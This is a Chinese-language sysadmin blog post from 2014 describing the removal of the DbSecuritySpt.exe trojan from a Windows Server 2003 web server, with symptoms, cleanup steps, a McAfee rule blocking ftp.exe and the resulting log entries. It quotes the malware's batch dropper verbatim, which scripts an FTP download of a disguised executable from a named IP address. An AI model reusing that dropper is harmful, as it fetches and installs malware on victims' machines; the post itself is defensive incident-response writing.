注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

文刀三皮的博客

专注于运行维护

 
 
 

日志

 
 
 
 

Windows DbSecuritySpt.exe 病毒查杀与防范  

2014-08-05 12:05:40|  分类: Windows |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
现象:  

网站不能访问,Windows server 2003系统
重启Apache 失败,并且 error.log 文件会增长的很大,重启Apache服务时,系统事件中会提示:

The Apache service named  reported the following error:
>>> (OS 10055)由于系统缓冲区空间不足或队列已满,不能执行套接字上的操作。  : make_sock: unable to listen for connections on address 0.0.0.0:80   

重启服务器能正常20分钟左右,然后又不行了。
然后打开一些敏感文件夹 c:\   c:\windows  c:\Windows\system32 等查看 都正常
网络上传流量也比较大。
但是不影响其他功能,系统也能正常使用。


分析与解决过程

查看任务管理器
会有很多的 ftp.exe cmd.exe 进程,一一杀掉,不然下面删除文件的时候会有提示使用中。 并且杀掉一个 ftp.exe 进程,cmd.exe 也会减少一个。

Windows DbSecuritySpt.exe 病毒查杀与防范 - 文刀三皮 - 文刀三皮的博客
 

无意中在D:\Tomcat6.0下发现
360Tray.exe  xqt.exe  xz.bat
都删除掉,
还有一个文本文件,内容如下:
echo open 42.157.4.107>s.txt
echo 123>>s.txt
echo 123>>s.txt
echo bin>>s.txt
echo get xs.exe 360Tray.exe>>s.txt
echo bye>>s.txt
ftp -s:s.txt

然后通过360杀毒软件  查到C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe 启动项,删除
并删除C:\Program Files\DbSecuritySpt 目录以及下面的文件
C:\Program Files\DbSecuritySpt
下发现
conf.n
DbSecuritySpt.exe
svch0st.exe

使用360安全卫士的流量防火墙  是否有异常程序访问网络,连接比较多。

运行 msconfig 查看启动项目  正常

如果你是Windows server 2008 还可以在Windows防火墙里将C:\Windows\system32  C:\Windows\syswow64  (X64) 下的ftp.exe 禁止访问外网。

预防:
修复Struts漏洞,最开始的木马,文件应该是通过Struts漏洞上传而来。

安装使用MCAFEE,这个是非常行之有效的办法,设置“访问保护属性” --“用户自定义的规则”  增加 
禁止调用ftp
保护的进程包括 cmd.exe  ftp.exe 
要组织的文件或者文件夹   C:\WINDOWS\system32\ftp.exe

这样可以看到残余病毒对系统的读写产生的文件日志:

2014-7-20     1:33:34     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\ftp.exe     用户定义的规则:禁止调用ftp     已阻止的操作: 读取
2014-7-20     1:33:50     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\index_1.log     用户定义的规则:【系统文件保护类】禁止在 System32 文件夹中创建新文件 (任何文件)     已阻止的操作: 创建
2014-7-20     1:33:50     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\ftp.exe     用户定义的规则:禁止调用ftp     已阻止的操作: 读取
2014-7-20     1:34:39     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\index_1.log     用户定义的规则:【系统文件保护类】禁止在 System32 文件夹中创建新文件 (任何文件)     已阻止的操作: 创建
2014-7-20     1:34:39     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\ftp.exe     用户定义的规则:禁止调用ftp     已阻止的操作: 读取
2014-7-20     1:35:47     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\index_1.log     用户定义的规则:【系统文件保护类】禁止在 System32 文件夹中创建新文件 (任何文件)     已阻止的操作: 创建
2014-7-20     1:35:47     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\ftp.exe     用户定义的规则:禁止调用ftp     已阻止的操作: 读取
2014-7-20     1:37:18     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\index_1.log     用户定义的规则:【系统文件保护类】禁止在 System32 文件夹中创建新文件 (任何文件)     已阻止的操作: 创建
2014-7-20     1:37:18     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\ftp.exe     用户定义的规则:禁止调用ftp     已阻止的操作: 读取
2014-7-20     1:38:58     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\index_1.log     用户定义的规则:【系统文件保护类】禁止在 System32 文件夹中创建新文件 (任何文件)     已阻止的操作: 创建
2014-7-20     1:38:58     已由访问保护规则禁止      NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\cmd.exe     C:\WINDOWS\system32\ftp.exe     用户定义的规则:禁止调用ftp     已阻止的操作: 读取


比特币旷工病毒
http://www.myhack58.com/Article/64/2013/39519_2.htm
cssrs.exe  和系统进程 csrss.exe 非常像
  评论这张
 
阅读(646)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018